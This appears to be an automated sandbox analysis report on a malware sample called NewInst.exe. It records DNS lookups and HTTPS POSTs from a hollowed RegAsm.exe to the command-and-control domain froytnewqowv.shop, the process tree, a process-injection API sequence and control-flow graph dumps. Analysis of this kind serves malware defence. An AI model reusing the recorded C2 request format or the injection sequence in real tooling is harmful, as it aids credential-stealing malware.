      Aug 29, 2024 22:58:58.728282928 CEST192.168.2.41.1.1.10x903Standard query (0)froytnewqowv.shopA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Aug 29, 2024 22:58:58.740365028 CEST1.1.1.1192.168.2.40x903No error (0)froytnewqowv.shop188.114.97.3A (IP address)IN (0x0001)false
      Aug 29, 2024 22:58:58.740365028 CEST1.1.1.1192.168.2.40x903No error (0)froytnewqowv.shop188.114.96.3A (IP address)IN (0x0001)false
      • froytnewqowv.shop
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.449730188.114.97.34437640C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-08-29 20:58:59 UTC264OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: froytnewqowv.shop
      2024-08-29 20:58:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
      Data Ascii: act=life
      2024-08-29 20:58:59 UTC555INHTTP/1.1 200 OK
      Date: Thu, 29 Aug 2024 20:58:59 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HybXD%2FvrelZriL2eg4H4HDQKTbWYoI%2FV%2Fdn9u0RwiBe7b4dE4MuZYu4BfIzBxM36iCna8fiUmNRrA90WtSR5M8amjca3scurrvb1ksSinoyGWBUPyzXPCckSoz%2FHHIiwY9t6Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8baf7658e9530f7d-EWR
      2024-08-29 20:58:59 UTC814INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
      Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
      2024-08-29 20:58:59 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
      Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
      2024-08-29 20:58:59 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 66 68 48 7a 41 54 6d 31 5f 58 33 35 63 4f 2e 51 59 34 51 30 5a 44 5a 79 46 54 4f 37 32 42 2e 69 6d 73 69 67 32 69 79 5a 74 49 2d 31 37 32 34 39 36 35 31 33 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e
      Data Ascii: <input type="hidden" name="atok" value="SfhHzATm1_X35cO.QY4Q0ZDZyFTO72B.imsig2iyZtI-1724965139-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn
      2024-08-29 20:58:59 UTC853INData Raw: 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72
      Data Ascii: or sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflar
      2024-08-29 20:58:59 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.449731188.114.97.34437640C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-08-29 20:58:59 UTC354OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Cookie: __cf_mw_byp=SfhHzATm1_X35cO.QY4Q0ZDZyFTO72B.imsig2iyZtI-1724965139-0.0.1.1-/api
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 48
      Host: froytnewqowv.shop
      2024-08-29 20:58:59 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 41 73 4e 4e 32 2d 2d 70 70 31 33 33 37 26 6a 3d
      Data Ascii: act=recive_message&ver=4.0&lid=1AsNN2--pp1337&j=
      2024-08-29 20:59:00 UTC808INHTTP/1.1 200 OK
      Date: Thu, 29 Aug 2024 20:59:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=145ovnuei1tg9oasiju9jdg1v4; expires=Mon, 23-Dec-2024 14:45:39 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISSbKlUozkVYsUjM5gJQbsmYEr0BzFPl1W3Srnd8he0e2G%2FqiaFk8XqVvH%2FworFgZw%2FoXR2ygOCcfFsBJO6F1ha%2B1a39BZ7BAGNH3VgMTqhKci%2FE6nmMMpRJjE23s2b47BtLJw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8baf765d8dda7c84-EWR
      alt-svc: h3=":443"; ma=86400
      2024-08-29 20:59:00 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
      Data Ascii: aerror #D12
      2024-08-29 20:59:00 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:16:58:58
      Start date:29/08/2024
      Path:C:\Users\user\Desktop\NewInst.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\NewInst.exe"
      Imagebase:0x70000
      File size:283'648 bytes
      MD5 hash:C2E7E93D02FA7CBA953E3DD4463BA91B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:16:58:58
      Start date:29/08/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:16:58:58
      Start date:29/08/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x4d0000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:5
      Start time:16:59:00
      Start date:29/08/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764
      Imagebase:0xc90000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:27.5%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:52.4%
        Total number of Nodes:21
        Total number of Limit Nodes:0

        Callgraph

        • Executed
        • Not Executed
        • Opacity -> Relevance
        • Disassembly available
        callgraph 0 Function_021B0499 1 Function_021B049D 2 Function_021B011C 3 Function_021B0491 4 Function_021B0090 5 Function_023A2BB7 6 Function_023A2B37 7 Function_021B0495 8 Function_021B0514 9 Function_021B0489 10 Function_021B0508 11 Function_021B0988 11->8 11->10 55 Function_021B04FC 11->55 12 Function_021B048D 13 Function_021B010C 14 Function_021B0481 15 Function_021B1101 16 Function_021B0A80 17 Function_021B0080 18 Function_021B0100 19 Function_021B0006 20 Function_023A2B27 21 Function_023A2BA7 22 Function_021B0485 23 Function_023A2499 24 Function_021B00BC 25 Function_021B04BC 26 Function_021B00B0 27 Function_021B0A37 28 Function_023A2B97 29 Function_023A2B17 30 Function_023A2B0E 31 Function_021B012C 32 Function_021B04A1 33 Function_021B00A0 34 Function_021B0520 35 Function_021B0B20 36 Function_023A2B87 37 Function_021B04A5 38 Function_021B08D8 39 Function_021B045C 40 Function_021B04D1 41 Function_021B0450 42 Function_023A2B77 43 Function_023A2BF7 44 Function_021B0054 45 Function_021B00D4 46 Function_021B04C9 47 Function_021B0848 48 Function_021B00C8 49 Function_021B04CD 50 Function_021B0140 51 Function_023A2B67 52 Function_023A2BE7 53 Function_021B0444 54 Function_021B0979 54->8 54->10 54->55 56 Function_021B0070 57 Function_021B00F0 58 Function_023A2BD7 59 Function_023A2B57 60 Function_021B0474 61 Function_021B08E8 62 Function_021B0468 63 Function_023A22CE 64 Function_021B0060 65 Function_021B04E7 66 Function_023A2B47 67 Function_023A2BC7 68 Function_021B00E4

        Control-flow Graph

        APIs
        • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,023A240B,023A23FB), ref: 023A2608
        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 023A261B
        • Wow64GetThreadContext.KERNEL32(000002E8,00000000), ref: 023A2639
        • ReadProcessMemory.KERNELBASE(000002EC,?,023A244F,00000004,00000000), ref: 023A265D
        • VirtualAllocEx.KERNELBASE(000002EC,?,?,00003000,00000040), ref: 023A2688
        • WriteProcessMemory.KERNELBASE(000002EC,00000000,?,?,00000000,?), ref: 023A26E0
        • WriteProcessMemory.KERNELBASE(000002EC,00400000,?,?,00000000,?,00000028), ref: 023A272B
        • WriteProcessMemory.KERNELBASE(000002EC,-00000008,?,00000004,00000000), ref: 023A2769
        • Wow64SetThreadContext.KERNEL32(000002E8,02260000), ref: 023A27A5
        • ResumeThread.KERNELBASE(000002E8), ref: 023A27B4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1667736926.00000000023A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_23a2000_NewInst.jbxd
        Similarity
        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
        • API String ID: 2687962208-1257834847
        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
        • Instruction ID: 80ee3500a03fe35677b2a0b2f9951ca28869e21a27a954b81ff6d0d2b28ec9a1
        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
        • Instruction Fuzzy Hash: 95B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA51CB94

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 23 21b0b20-21b0b81 26 21b0b83-21b0b97 23->26 28 21b0b9d-21b0bf6 26->28 29 21b102c-21b10ce VirtualProtect 26->29 28->29 30 21b0bfc-21b0c0a 28->30 36 21b10d0 29->36 37 21b10d5-21b10ee 29->37 30->29 32 21b0c10-21b0c1b 30->32 32->26 34 21b0c21-21b0c23 32->34 35 21b0c26-21b0c34 34->35 35->29 38 21b0c3a-21b0c4a 35->38 36->37 38->29 40 21b0c50-21b0c5c 38->40 41 21b0c5e-21b0c64 40->41 42 21b0c65-21b0c72 40->42 41->42 42->29 43 21b0c78-21b0c85 42->43 43->29 44 21b0c8b-21b0c9a 43->44 44->29 45 21b0ca0-21b0cab 44->45 45->35 46 21b0cb1-21b0cc3 45->46 47 21b0cc9-21b0cd7 46->47 48 21b1024-21b102b 46->48 49 21b0cd9-21b0ce0 47->49 50 21b0ce1-21b0cef 47->50 49->50 50->29 51 21b0cf5-21b0d01 50->51 52 21b0d0a-21b0d17 51->52 53 21b0d03-21b0d09 51->53 52->29 54 21b0d1d-21b0d2a 52->54 53->52 54->29 55 21b0d30-21b0d3f 54->55 55->29 56 21b0d45-21b0d6a 55->56 57 21b0d6c-21b0d73 56->57 58 21b0d74-21b0eb9 56->58 57->58 61 21b0ebb-21b0ec3 58->61 62 21b0ec9-21b0ed2 58->62 61->62 63 21b0edd-21b0ee6 62->63 64 21b0ed4 62->64 65 21b0ee9-21b0f17 63->65 64->65 66 21b0ed6-21b0edb 64->66 67 21b0f19 65->67 68 21b0f1f-21b0f29 65->68 66->63 66->65 67->68 69 21b0f1b-21b0f1d 67->69 70 21b0f2b 68->70 71 21b0f34-21b0f42 68->71 69->68 72 21b0f2d-21b0f32 70->72 73 21b0f44-21b0f65 70->73 74 21b0f6b-21b0f77 71->74 72->71 72->73 73->74 75 21b0f79-21b0f83 74->75 76 21b0f86-21b0f8d 74->76 75->76 77 21b0f8f 76->77 78 21b0f91-21b0fa0 76->78 79 21b0fa6-21b0fb8 77->79 78->79 80 21b0fba 79->80 81 21b0fc0 79->81 82 21b0fbc-21b0fbe 80->82 83 21b0fc2-21b0fdf 80->83 84 21b0fe9-21b0ff5 81->84 82->81 82->83 83->84 84->29 85 21b0ff7-21b1006 84->85 85->29 86 21b1008-21b101e 85->86 86->47 86->48
        APIs
        • VirtualProtect.KERNELBASE(033A3594,?,?,?), ref: 021B10C1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1667623444.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_21b0000_NewInst.jbxd
        Similarity
        • API ID: ProtectVirtual
        • String ID: #l>@$&S!
        • API String ID: 544645111-1705501573
        • Opcode ID: 659adfc955ce8ff34f19eb60afe968aa69c147ec4b359d0e3cdca5d024749e69
        • Instruction ID: ae758c8d4f72bf33b7e3d59eb25841be15174da352c37cbbf3d6433051866c9b
        • Opcode Fuzzy Hash: 659adfc955ce8ff34f19eb60afe968aa69c147ec4b359d0e3cdca5d024749e69
        • Instruction Fuzzy Hash: FFF18EB0E412688FDB21CFA9C990BDEBBB2BF48304F158599E459AB351C7309D85CF94

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 88 21b0508-21b10ce VirtualProtect 91 21b10d0 88->91 92 21b10d5-21b10ee 88->92 91->92
        APIs
        • VirtualProtect.KERNELBASE(033A3594,?,?,?), ref: 021B10C1
        Memory Dump Source
        • Source File: 00000000.00000002.1667623444.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_21b0000_NewInst.jbxd
        Similarity
        • API ID: ProtectVirtual
        • String ID:
        • API String ID: 544645111-0
        • Opcode ID: b57739ed2a7e0f752e4ef759436914cc18f904179759d8c2e28700b613abafe8
        • Instruction ID: 101ab8dd8de18b86ae5effee5d6a4a02fd91ef9b30ee74a1256db06abc0be426
        • Opcode Fuzzy Hash: b57739ed2a7e0f752e4ef759436914cc18f904179759d8c2e28700b613abafe8
        • Instruction Fuzzy Hash: 3C21EFB5904259ABCB10DF9AD984ADEFBB4FF08314F10812AE918B7210C3B4A954CFA5

        Execution Graph

        Execution Coverage:2.4%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:24.2%
        Total number of Nodes:124
        Total number of Limit Nodes:18
        execution_graph 12021 42e5c2 12022 42e644 SysAllocString 12021->12022 12023 42e60f 12021->12023 12024 42e66f 12022->12024 12023->12022 12025 42e6a2 12026 42e6c1 12025->12026 12027 42e704 SysAllocString 12025->12027 12026->12027 12028 42e7c4 SysAllocString 12027->12028 12029 42e78d 12027->12029 12030 42e7f2 12028->12030 12029->12028 12031 42e942 SysStringLen 12030->12031 12032 42eba2 12030->12032 12033 42eb4d 12030->12033 12034 42eb57 SysFreeString SysFreeString 12030->12034 12035 42e877 VariantInit 12030->12035 12036 42eb3c VariantClear 12030->12036 12040 42eb26 12030->12040 12042 42e980 12030->12042 12044 42eb20 12030->12044 12031->12042 12039 42ebba GetVolumeInformationW 12032->12039 12033->12034 12038 42eb80 SysFreeString 12034->12038 12037 42e8d9 12035->12037 12036->12033 12037->12031 12037->12032 12037->12036 12037->12040 12037->12042 12037->12044 12038->12044 12041 42ebdf 12039->12041 12039->12044 12040->12036 12041->12041 12043 42ee7b 12041->12043 12041->12044 12049 42ee3e 12041->12049 12055 431b50 12041->12055 12042->12032 12042->12036 12042->12040 12042->12041 12042->12044 12059 431bc0 12043->12059 12049->12043 12063 432000 12049->12063 12067 431e70 12049->12067 12071 4320d0 12049->12071 12051 42edbf 12051->12049 12058 433ae0 LdrInitializeThunk 12051->12058 12056 431b9e RtlAllocateHeap 12055->12056 12057 431b6a 12055->12057 12056->12051 12057->12056 12057->12057 12058->12049 12060 42ee81 12059->12060 12061 431bd5 RtlFreeHeap 12059->12061 12060->12044 12079 433ae0 LdrInitializeThunk 12060->12079 12061->12060 12064 43208e 12063->12064 12065 43200a 12063->12065 12064->12049 12065->12064 12080 433ae0 LdrInitializeThunk 12065->12080 12068 431e82 12067->12068 12069 431f62 12067->12069 12068->12069 12081 433ae0 LdrInitializeThunk 12068->12081 12069->12049 12072 4320e6 12071->12072 12076 432176 12071->12076 12072->12076 12077 43216e 12072->12077 12082 433ae0 LdrInitializeThunk 12072->12082 12073 4322be 12074 432000 LdrInitializeThunk 12073->12074 12073->12076 12074->12076 12076->12049 12077->12073 12083 433ae0 LdrInitializeThunk 12077->12083 12079->12044 12080->12064 12081->12069 12082->12077 12083->12073 12084 409e20 12085 409e29 12084->12085 12086 409e39 GetCurrentProcess 12085->12086 12095 409e37 ExitProcess 12085->12095 12088 409e44 12086->12088 12089 409e48 12088->12089 12090 409e4a GetWindowInfo 12088->12090 12122 4339f0 12089->12122 12099 40ad00 12090->12099 12094 409e6b 12117 40d590 12094->12117 12100 40ad96 LoadLibraryExW 12099->12100 12101 40ad56 12099->12101 12103 40adaf 12100->12103 12101->12100 12105 409e65 12103->12105 12107 40b1d8 12103->12107 12113 40afa3 12103->12113 12125 40b480 12103->12125 12104 40b218 CoInitializeEx 12104->12105 12106 40b22a CoInitializeSecurity 12104->12106 12105->12089 12105->12094 12106->12105 12108 40b24a 12106->12108 12107->12104 12107->12105 12129 42e490 12108->12129 12110 40b45c 12111 431bc0 RtlFreeHeap 12110->12111 12111->12105 12112 40b480 RtlFreeHeap 12114 40b408 12112->12114 12113->12105 12113->12110 12113->12112 12114->12110 12115 40b40f 12114->12115 12116 431bc0 RtlFreeHeap 12115->12116 12116->12107 12118 40d5d2 12117->12118 12119 40da82 12118->12119 12120 40d9e5 GetSystemDirectoryW 12118->12120 12121 431bc0 RtlFreeHeap 12118->12121 12120->12118 12121->12118 12132 434ae0 12122->12132 12124 4339f5 FreeLibrary 12124->12095 12128 40b4c3 12125->12128 12126 40b814 12126->12103 12127 431bc0 RtlFreeHeap 12127->12126 12128->12126 12128->12127 12130 42e4f7 12129->12130 12131 42e56a CoCreateInstance 12130->12131 12131->12130 12131->12131 12133 434ae9 12132->12133 12133->12124 12134 40c9a2 12136 40c5b4 12134->12136 12135 40c732 12136->12134 12136->12135 12137 431bc0 RtlFreeHeap 12136->12137 12139 40c9dc 12136->12139 12137->12139 12138 431bc0 RtlFreeHeap 12140 40c9e5 12138->12140 12139->12138 12159 434450 12160 434200 12159->12160 12161 4342ae 12160->12161 12163 433ae0 LdrInitializeThunk 12160->12163 12163->12161 12146 431c47 12147 431c37 RtlFreeHeap 12146->12147 12148 431c43 12147->12148 12149 433065 12150 4330dc LoadLibraryExW 12149->12150 12151 4330ac 12149->12151 12152 4330ee 12150->12152 12151->12150 12164 433d5a 12167 433da4 12164->12167 12165 433fce 12172 433f2d 12165->12172 12176 433ae0 LdrInitializeThunk 12165->12176 12166 433efe 12166->12165 12166->12172 12175 433ae0 LdrInitializeThunk 12166->12175 12167->12166 12174 433ae0 LdrInitializeThunk 12167->12174 12169 4342ae 12172->12169 12177 433ae0 LdrInitializeThunk 12172->12177 12174->12166 12175->12165 12176->12172 12177->12169 12178 42e67b CoSetProxyBlanket 12153 4340ce 12155 43404c 12153->12155 12154 434129 12155->12154 12158 433ae0 LdrInitializeThunk 12155->12158 12157 43414a 12158->12157

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 42e6a2-42e6bf 1 42e6c1 0->1 2 42e704-42e78b SysAllocString 0->2 3 42e6d0-42e702 1->3 4 42e7c4-42e7f7 SysAllocString 2->4 5 42e78d-42e78f 2->5 3->2 3->3 8 42e942-42e97a SysStringLen 4->8 9 42eba2-42ebd8 call 4350c0 GetVolumeInformationW 4->9 10 42eb20 4->10 11 42eba0 4->11 12 42e9e1-42e9fb call 4095a0 4->12 13 42eb26 4->13 14 42e804-42e824 4->14 15 42e989-42e990 4->15 16 42eb09-42eb12 4->16 17 42eb4d-42eb53 4->17 18 42eb33-42eb39 call 4095b0 4->18 19 42e830-42e84c 4->19 20 42eaf0-42eb02 4->20 21 42e856-42e870 4->21 22 42eb57-42eb7c SysFreeString * 2 4->22 23 42e877-42e8d7 VariantInit 4->23 24 42e7fe 4->24 25 42eb3c-42eb49 VariantClear 4->25 6 42e790-42e7c2 5->6 6->4 6->6 8->15 30 42ec00-42ec07 9->30 31 42ec40 9->31 32 42ed66-42ed6d 9->32 33 42ec0e-42ec18 9->33 34 42ec32-42ec34 9->34 35 42ec30 9->35 36 42ebdf-42ebf1 9->36 37 42ec1f-42ec25 9->37 53 42ead0-42eae1 12->53 54 42ea01-42ea0d 12->54 13->18 14->19 39 42e992-42e994 15->39 40 42e9d6-42e9d8 15->40 16->9 16->10 16->11 16->13 16->16 16->18 16->20 16->25 16->30 16->31 16->32 16->33 16->34 16->35 16->36 16->37 17->22 18->25 47 42e850 19->47 20->9 20->10 20->11 20->13 20->16 20->18 20->25 20->30 20->31 20->32 20->33 20->34 20->35 20->36 20->37 21->8 21->9 21->10 21->11 21->12 21->13 21->15 21->16 21->17 21->18 21->20 21->23 21->25 42 42eb80-42eb99 SysFreeString 22->42 28 42e913-42e921 23->28 29 42e8d9 23->29 24->14 25->17 57 42e925-42e93b 28->57 48 42e8e0-42e911 29->48 30->31 30->33 30->34 30->35 30->37 46 42ec43-42ec5c 31->46 41 42eda0 32->41 33->31 33->34 33->35 33->37 34->46 36->30 36->31 36->32 36->33 36->34 36->35 36->37 37->35 50 42e9ae-42e9b2 39->50 40->12 42->11 55 42ecd0-42ecd7 46->55 56 42ec5e-42ec6e 46->56 47->21 48->28 48->48 51 42e980 50->51 52 42e9b4-42e9d0 50->52 51->15 58 42e9d2-42e9d4 52->58 59 42e9a0-42e9ac 52->59 53->9 53->10 53->11 53->13 53->16 53->18 53->20 53->25 53->30 53->31 53->32 53->33 53->34 53->35 53->36 53->37 54->53 61 42ea13-42ea22 54->61 64 42ed17-42ed1f 55->64 62 42ece0-42ece5 56->62 63 42ec70-42ec72 56->63 57->8 57->9 57->10 57->11 57->12 57->13 57->15 57->16 57->18 57->20 57->25 58->59 59->50 59->51 65 42ea25-42ea30 61->65 67 42ece7-42ed0c 62->67 68 42ecba-42ecc5 62->68 66 42ec80-42ecb3 63->66 69 42ed20-42ed28 64->69 65->53 70 42ea36-42ea3a 65->70 66->66 71 42ecb5-42ecb8 66->71 72 42ed0f-42ed13 67->72 68->72 69->69 73 42ed2a-42ed34 69->73 74 42ea45-42ea57 70->74 75 42ea3c-42ea43 70->75 71->67 71->68 72->64 73->41 76 42eda2-42eda7 73->76 77 42ed40-42ed4d 73->77 78 42ef30-42ef51 call 432000 73->78 79 42efb0-42efc6 call 4320d0 73->79 80 42ef07-42ef1e 73->80 81 42ed54-42ed5f 73->81 82 42edb5-42edba call 431b50 73->82 83 42ee7b-42ee9d call 431bc0 73->83 84 42ef58-42efa9 call 431e50 call 431e70 73->84 85 42edae-42edb0 73->85 90 42ea59-42ea61 74->90 91 42ea7d-42ea85 74->91 89 42eab7-42eabd 75->89 76->78 76->79 76->80 76->82 76->83 76->84 76->85 77->41 77->76 77->77 77->78 77->79 77->80 77->81 77->82 77->83 77->84 77->85 78->79 78->83 78->84 79->78 80->78 80->79 80->83 80->84 81->30 81->31 81->32 81->33 81->34 81->35 81->37 96 42edbf-42edde 82->96 106 42eed0-42eed8 83->106 107 42ee9f 83->107 84->78 84->79 86 